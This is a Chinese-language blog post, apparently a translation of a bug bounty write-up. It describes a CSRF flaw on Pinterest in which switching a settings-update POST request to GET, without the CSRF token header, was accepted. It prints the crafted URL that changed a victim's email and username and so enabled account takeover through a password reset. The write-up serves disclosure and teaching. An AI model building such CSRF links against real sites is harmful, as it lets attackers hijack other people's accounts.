第十八篇:CSRF导致账号接管

原文:How I could have taken over any Pinterest account

漏洞:GET请求绕过POST CSRF Token

作者:Arnold Anthony

难度:中

哪里有BUG??

  当浏览”https://www.pinterest.com"时,我发现CSRF tokens是通过http头”X-CSRFToken”传递的,所以正常情况下要验证CSRF token的话,请求如下所示:

1
2
3
4
5
6
7
POST /_ngjs/resource/UserSettingsResource/update/ HTTP/1.1
Host: www.pinterest.com
Content-Type: application/x-www-form-urlencoded
X-CSRFToken: <CSRF Token>
……..
……..
<POST Parameters>

1)首先,我将POST请求中的”X-CSRFToken”头删掉,然后通过burpsuit转发,服务器响应error “/resource/UserSettingsResource/update/ didn’t finish after 8 seconds”,这意味着CSRF令牌正在进行验证

2)然后,我将上面的POST请求更改为GET请求,同样删掉”X-CSRFToken”,转发之后我得到响应”200 ok”

账号接管

  这是一个基于GET请求的CSRF,我们需要做的仅仅是制作一个URL链接,将所有通过POST传递的参数通过GET请求进行传递(不是所有程序都接受这种方法,大家可以通过burpsuit自带的”change request method”来转换)

1
https://www.pinterest.com/_ngjs/resource/UserSettingsResource/update/?source_url=%2Fsettings%2F&data=%7B%22options%22%3A%7B%22impressum_url%22%3Anull%2C%22last_name%22%3A%22dummy%22%2C%22custom_gender%22%3Anull%2C%22locale%22%3A%22en-US%22%2C%22has_password%22%3Atrue%2C%22email_settings%22%3A%22Everything+%28except+emails+you%27ve+turned+off%29%22%2C%22news_settings%22%3A%22Activity+from+other+people+on+Pinterest%22%2C%22id%22%3A%22%22%2C%22is_write_banned%22%3Afalse%2C%22first_name%22%3A%22dummyuser%22%2C%22push_settings%22%3A%22Everything+%28except+push+you%27ve+turned+off%29%22%2C%22personalize_from_offsite_browsing%22%3Atrue%2C%22facebook_timeline_enabled%22%3Afalse%2C%22email_changing_to%22%3Anull%2C%22personalize_nux_from_offsite_browsing%22%3Afalse%2C%22is_tastemaker%22%3Afalse%2C%22type%22%3A%22user_settings%22%2C%22email%22%3A%22anytestemail%40user.com%22%2C%22website_url%22%3A%22%22%2C%22location%22%3A%22%22%2C%22username%22%3A%22dummyuser%22%2C%22pfy_preference%22%3Atrue%2C%22facebook_publish_stream_enabled%22%3Afalse%2C%22email_bounced%22%3Afalse%2C%22is_partner%22%3Anull%2C%22ads_customize_from_conversion%22%3Atrue%2C%22additional_website_urls%22%3A%5B%5D%2C%22about%22%3A%22test%22%2C%22gender%22%3A%22male%22%2C%22age%22%3Anull%2C%22exclude_from_search%22%3Afalse%2C%22birthdate%22%3Anull%2C%22show_impressum%22%3Afalse%2C%22email_biz_settings%22%3A%22Everything+%28includes+announcements%2C+expert+tips%2C+creative+ideas%2C+and+more%29%22%2C%22country%22%3A%22IN%22%2C%22hide_from_news%22%3Afalse%2C%22collaborative_boards%22%3A%5B%5D%7D%2C%22context%22%3A%7B%7D%7D

  当用户点击上述链接后,它的用户名和电子邮件ID分别会被更改为”dummyuser”和”anytestemail@user.com”,重置了电子邮件之后我就能通过邮箱地址重置密码

本文标题:第十八篇:CSRF导致账号接管

文章作者:TimeS0ng

发布时间:2019-02-16, 19:09:56

最后更新:2019-02-16, 19:41:17

原始链接:http://TimeS0ng.github.io/2019/02/16/第十八篇:CSRF导致账号接管/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

文章目录
  1. 1. 原文:How I could have taken over any Pinterest account
  2. 2. 漏洞:GET请求绕过POST CSRF Token
  3. 3. 作者:Arnold Anthony
  4. 4. 难度:中
  • 哪里有BUG??
    1. 1.   当浏览”https://www.pinterest.com"时,我发现CSRF tokens是通过http头”X-CSRFToken”传递的,所以正常情况下要验证CSRF token的话,请求如下所示:
    2. 2. 1)首先,我将POST请求中的”X-CSRFToken”头删掉,然后通过burpsuit转发,服务器响应error “/resource/UserSettingsResource/update/ didn’t finish after 8 seconds”,这意味着CSRF令牌正在进行验证
    3. 3. 2)然后,我将上面的POST请求更改为GET请求,同样删掉”X-CSRFToken”,转发之后我得到响应”200 ok”
  • 账号接管
    1. 1.   这是一个基于GET请求的CSRF,我们需要做的仅仅是制作一个URL链接,将所有通过POST传递的参数通过GET请求进行传递(不是所有程序都接受这种方法,大家可以通过burpsuit自带的”change request method”来转换)
    2. 2.   当用户点击上述链接后,它的用户名和电子邮件ID分别会被更改为”dummyuser”和”anytestemail@user.com”,重置了电子邮件之后我就能通过邮箱地址重置密码
    • |